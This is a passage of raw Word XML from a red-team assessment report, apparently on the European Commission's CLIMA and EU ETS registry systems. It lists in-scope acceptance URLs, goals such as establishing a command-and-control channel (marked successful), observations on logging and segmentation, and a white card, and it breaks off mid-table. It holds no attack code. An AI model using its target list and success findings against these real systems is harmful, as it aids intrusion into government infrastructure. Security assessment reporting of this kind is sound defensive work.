          <w:p w14:paraId="28E62D17" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>https://acc.unionregistry.ec.europa.eu/euregistry/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215C843A" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>https://acc.unionregistry.ec.europa.eu/ar/#/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754979BD" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>https://acc.unionregistry.ec.europa.eu/na/#/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED02B3E" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>https://intragate.acceptance.ec.europa.eu/clima/ets/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3317AC6F" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA web servers (servers hosting CLIMA web app) on the scope</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E3F0008" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA IT applications and servers on the scope that can be used as jump hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41F1075A" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA and ETS assets where the CTF flags are stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="56B3D65E"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529" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
          </w:tcPr>
          <w:p w14:paraId="4C33C9B6"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Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F92F72" w:rsidRPr="001019D3" w14:paraId="6E05D15F" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7463FD10" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Establish C&amp;C communication channel from any in-scope servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3AF034A4"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529" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="2C204BB9"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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F92F72" w:rsidRPr="001019D3" w14:paraId="51264780" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="703E0931" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Provide </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IoCs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (screenshots) from any compromised in-scope asset with the following:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F39B5C" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Username </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A9BC3F5" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hostname </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B955EF" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromised Host IP Address </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35229A0D" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7CB19A" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">User Account </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B6225C" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel2"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Level </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B50ECD9" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="529" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="1A9B4156" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="00F92F72">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A4D5125" w14:textId="5940F4D4" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="00F92F72">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc213253596"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Goals and objectives.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="072C352E" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D02DE05" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc212654651"/>
      <w:bookmarkStart w:id="127" w:name="_Toc213253557"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Positive and general observations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520C4EF1" w14:textId="0BDF723D" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Throughout the Red Team engagement, several strengths within the CLIMA’s security hardening were observed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D4752" w14:textId="162E3247" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Critical business systems demonstrated a degree of resilience, and many of the attempted attacks required chaining multiple weaknesses together in order to achieve meaningful impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E5F179" w14:textId="7988CD72" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Logging was enabled across various platforms, which, although not always fully triaged or acted upon, provided an evidentiary trail that could support future incident response and forensic investigations. The Red Team reached this assumption since in many cases no action was taken to contact the Red Team leader to clarify whether the activities were malicious </w:t>
      </w:r>
      <w:r w:rsidR="00DF1287" w:rsidRPr="001019D3">
        <w:t>nor</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF1287" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>access blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DA33E" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The presence of access controls and segmentation between certain environments increased the effort required to propagate laterally, demonstrating that existing security measures are contributing to layered defence. Nevertheless, this needs further investigation to ensure what actions have been logged and what was the response taken from a defensive perspective since the Red Team was not in a position to access the logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C7E21" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Additionally, the organization showed a high level of cooperation and transparency during the engagement, with security and operational teams receptive to findings and eager to use the results to strengthen defences. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1F9486" w14:textId="4F8E7F08" w:rsidR="00B02A36" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>These positive indicators highlight that the foundation for a mature security program is already in place, and with focused improvements on monitoring, configuration management, and user awareness, the organization is well-positioned to significantly enhance its ability to defend against advanced adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC3F08" w14:textId="77777777" w:rsidR="00B02A36" w:rsidRPr="001019D3" w:rsidRDefault="00B02A36">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10784A0A" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc212654652"/>
      <w:bookmarkStart w:id="129" w:name="_Toc213253558"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>White cards</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="71BD2777" w14:textId="3546EA29" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>A white card is a simulated event in the campaign. The Initiator may issue a white card for various reasons, such as if a system is too fragile or critical to risk attempting to exploit it or if there is a need or desire to bypass exploitation due to time constraints</w:t>
      </w:r>
      <w:r w:rsidR="00F92F72" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2163"/>
        <w:gridCol w:w="1146"/>
        <w:gridCol w:w="5437"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B312DF" w:rsidRPr="001019D3" w14:paraId="26E5615B" w14:textId="77777777" w:rsidTr="00B312DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1237" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="009FE52A" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="655" w:type="pct"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w14:paraId="11272326" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3108" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="257C26B3" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B312DF" w:rsidRPr="001019D3" w14:paraId="7FEFEABB" w14:textId="77777777" w:rsidTr="00B312DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1237" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D4A45B" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUTL database identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="655" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20B21369" w14:textId="0ACA51DE" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00B312DF" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>03/04/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3108" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A9F64EE" w14:textId="038EFF1A" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
            <w:pPr>
              <w:spacing w:before="60" w:line="264" w:lineRule="auto"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The EUTL transaction database FQDN had to be provided as it could not be identified or discovered through the Red Team’s level of access or knowledge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="231AE8E5" w14:textId="75B54183" w:rsidR="00B312DF" w:rsidRPr="001019D3" w:rsidRDefault="00B312DF" w:rsidP="00B312DF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc212654653"/>
      <w:bookmarkStart w:id="131" w:name="_Toc213253597"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: List of issued White Cards.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="14DA0B47" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc213253559"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Deconflictions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="0BEF5DC4" w14:textId="1120E03B" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>While p</w:t>
      </w:r>
      <w:r w:rsidR="00E76B76" w:rsidRPr="001019D3">
        <w:t>erforming offensive assessments such as this Red Team campaign, it is possible to trigger an alert or generate anomalous logs that draw the Blue Team’s attention. If the System Owner cannot identify Red Team activities as the source, the Blue Team would likely contact the Red Team to deconflict the event.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1850"/>
        <w:gridCol w:w="1167"/>
        <w:gridCol w:w="5729"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E76B76" w:rsidRPr="001019D3" w14:paraId="0B680B6C" w14:textId="77777777" w:rsidTr="00B312DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1058" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="316C971E" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="667" w:type="pct"/>
            <w:noWrap/>
          </w:tcPr>
          <w:p w14:paraId="2DEE274D" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3275" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="246680CD" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
